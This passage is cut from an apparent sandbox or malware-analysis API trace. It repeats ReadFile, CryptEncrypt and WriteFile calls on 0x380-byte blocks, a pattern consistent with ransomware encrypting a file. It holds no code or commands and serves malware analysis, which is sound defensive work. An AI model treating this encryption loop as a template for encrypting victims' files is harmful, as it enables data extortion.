lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.280] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.280] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.280] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.281] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.281] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.281] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.281] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.281] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.282] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.282] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.282] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.282] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.282] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.282] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.283] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.283] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.283] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.283] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.283] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.284] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.284] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.284] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.285] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.285] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.285] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.285] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.285] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.286] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.287] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.287] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.287] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.287] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.287] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] ReadFile (in: hFile=0x5d48, 